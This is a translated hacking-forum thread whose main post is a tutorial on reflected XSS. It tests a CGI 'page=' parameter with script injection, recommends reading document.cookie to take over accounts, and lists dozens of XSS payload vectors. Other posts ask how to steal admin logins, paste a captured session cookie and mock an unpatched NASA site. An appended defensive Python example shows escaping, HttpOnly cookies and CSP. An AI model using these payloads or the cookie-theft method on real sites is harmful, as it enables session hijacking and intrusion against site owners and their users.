Posts: 1,101
Threads: 76
Joined: Mar 2011
(08-26-2012, 01:38 AM)wine trochanter Wrote: bro, bro, got a question
how do you get the admin password and username with xss?
well, I already shared the xss script there for seeing the password and username..
but there's no guarantee it works, it depends on the website..
just try googling, there are plenty of scripts for xss..
but don't use it for evil, just for joking around with friends, ok.. hahahha..
CAN U MAKE ME THE KING OF SATAN..??
Posts: 88
Threads: 25
Joined: Feb 2012
hey, I tried the cookie alert and got this
griya_id_session=d04e4fe0934d4f6e035097b26b8715d6
what does that mean?
Posts: 16
Threads: 2
Joined: Nov 2012
(02-14-2012, 02:49 PM)cassaprodigy Wrote: yesterday I was messing around since I could finally get online again,
even though I had to put up with the pain because the TCP port in my head keeps staying open.. ugh, so dramatic -_-" :badpc:
I was idly browsing a site, tried some xss, and hey, it worked..
so let me try to explain what xss is..
XSS is a way of inserting HTML code/script into a web site so that it is run by the browser on the client (in my own words)
xss only changes a page of the site temporarily, unlike injection, where we get root access and can change everything right down to the index..
xss scripts I usually use:
- HTML
- JavaScript
- Active X
- Flash
those are the ones I know and usually use to look for xss
I'll try to explain just the javascript one...
for the others, just go ask grandpa google..
here I try searching/testing from cgi files, because a lot of cgi files can be xss'd.. -_-"
you've surely opened a web page and seen text like " 404 - data.php Not Found " or similar, which indicates a file or page of that site that doesn't exist or can't be opened.. that's because there is a cgi file that responds when the file isn't on the server or site..
to make it clear, let's go straight to it..
/cgi-bin/program.cgi?page=downloads.html
try changing it to
/cgi-bin/program.cgi?page=maho.html
you'll surely get " 404 - data.php Not Found " or similar,
now let's try the xss test.. drum roll
/cgi-bin/program.cgi?page=<script>alert('tes Maho')</script>
if an alert popup box appears, that means the site can be xss'd..
the key to whether a site is vuln to xss: enter the script <script>alert('tes')</script> in the site's url field, easy right,
( if it's that easy, why bother explaining it at such length ) :badpc:
Oh, but there's a but: besides that script, xss can also be used to find out an account password by way of <script>alert(document.cookie)</script>.
remember, remember ( ad mode on ) xss can be permanent or temporary as long as the site hasn't been patched, ( hopefully never ) amen :badpc:
there are many more scripts used for xss ( a small part of them I got from googling ) -_-" :
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
That's it for now for this tutorial from a nobody like me, worse than a new user ( according to computer_geex )
:apn: peace, bro
hopefully everyone understands, I tried to explain it in my own words, that's why.. -_-"
that's all, bye-bye everyone..
thanks to zee Maho and xsan-lahci who kept me company :*
cool, bro, thanks for the explanation.......
nice........
root@punisher404:~# sudo IBT-Sumbar Crew
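Added example, not part of any post in this thread: a defender's view of the `page=` reflection and the `document.cookie` alert described above. It shows the 404 message built with and without output encoding, plus a session cookie marked HttpOnly. The handler, its function names, the page table and the session value are assumptions made for illustration; only the `page` parameter, the 404 text and the cookie name come from the thread.

```python
import html
from urllib.parse import parse_qs

# Constructed stand-in for the pages program.cgi can serve (assumption).
KNOWN_PAGES = {"downloads.html": "<h1>Downloads</h1>"}


def not_found_vulnerable(page):
    # Raw reflection: any markup in `page` becomes part of the document.
    return "<html><body>404 - " + page + " Not Found</body></html>"


def not_found_escaped(page):
    # html.escape rewrites & < > " ' as entities, so the browser shows the
    # value as text instead of parsing it as tags or attributes.
    return "<html><body>404 - " + html.escape(page, quote=True) + " Not Found</body></html>"


def session_cookie_header(session_id):
    # HttpOnly keeps the cookie out of document.cookie; Secure and SameSite
    # limit where the browser will send it.
    return ("Set-Cookie: griya_id_session=" + session_id +
            "; Path=/; HttpOnly; Secure; SameSite=Lax")


def handle(query_string, render_404=not_found_escaped):
    # Returns (status, headers, body) for a request to the hypothetical CGI.
    page = parse_qs(query_string, keep_blank_values=True).get("page", [""])[0]
    headers = [
        "Content-Type: text/html; charset=utf-8",
        # Second layer: with this policy the browser refuses inline script.
        "Content-Security-Policy: default-src 'self'",
        session_cookie_header("CONSTRUCTED-SESSION-ID"),
    ]
    if page in KNOWN_PAGES:
        return 200, headers, KNOWN_PAGES[page]
    return 404, headers, render_404(page)


if __name__ == "__main__":
    probe = "page=<script>alert('tes')</script>"  # test string from the post
    for renderer in (not_found_vulnerable, not_found_escaped):
        status, _, body = handle(probe, renderer)
        print(renderer.__name__, status, body)
```

With the escaped renderer the test string comes back as visible text in the 404 message, and a cookie set with HttpOnly does not appear in `document.cookie`.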
Posts: 1,101
Threads: 76
Joined: Mar 2011
(11-15-2012, 09:27 AM)Clound_Carbelius Wrote: here, bro, the NASA website :-bd
=)))=)))=))
wow, that's actually an old bug, but how is it still there..
pretty grim too, turns out the admin hasn't patched it.. wkakakak
:nohope ugh -_-"
CAN U MAKE ME THE KING OF SATAN..??